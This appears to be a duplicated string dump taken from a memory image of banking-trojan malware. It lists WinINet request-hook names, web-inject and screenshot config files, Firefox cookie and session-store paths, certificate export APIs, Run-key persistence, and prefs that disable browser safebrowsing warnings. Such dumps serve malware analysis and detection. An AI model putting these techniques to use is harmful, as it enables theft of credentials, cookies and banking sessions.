INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
HTTP_QUERY_MIME_VERSION
Content-Length: %u
Content-Length: %u
HTTP/
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies-nontor.xml
cookies.txt
cookies.txt
sessionstore.js
sessionstore.js
sessionstore.bak
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite-journal
cookies.sqlite
cookies.sqlite
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
\\.\pipe\processingpipe_
\\.\pipe\processingpipe_
services.exe
services.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
\\.\pipe\globpluginspipe
\\.\pipe\globpluginspipe
X X
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
%System%\WININET.dll
%System%\WININET.dll
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\ntdll.dll
%System%\USER32.dll
%System%\USER32.dll
%System%\CRYPT32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
%System%\ADVAPI32.dll
%System%\ADVAPI32.dll
c:\windows\system32\WS2_32.dll
c:\windows\system32\WS2_32.dll
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
svchost.exe_1084_rwx_0BAD0000_00045000:
.text
.text
.reloc
.reloc
config.dat
config.dat
explorer.exe
explorer.exe
webinjects.txt
webinjects.txt
screenshots.txt
screenshots.txt
threadmetadata!nfo%d
threadmetadata!nfo%d
XX
XX
SOFTWARE\Microsoft Windows
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
u.u.u u:u:u.u
0xx
0xx
(%d bytes)
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
HTTP_QUERY_MIME_VERSION
Content-Length: %u
Content-Length: %u
HTTP/
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies-nontor.xml
cookies.txt
cookies.txt
sessionstore.js
sessionstore.js
sessionstore.bak
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite-journal
cookies.sqlite
cookies.sqlite
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
\\.\pipe\processingpipe_
\\.\pipe\processingpipe_
services.exe
services.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
\\.\pipe\globpluginspipe
\\.\pipe\globpluginspipe
X X
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
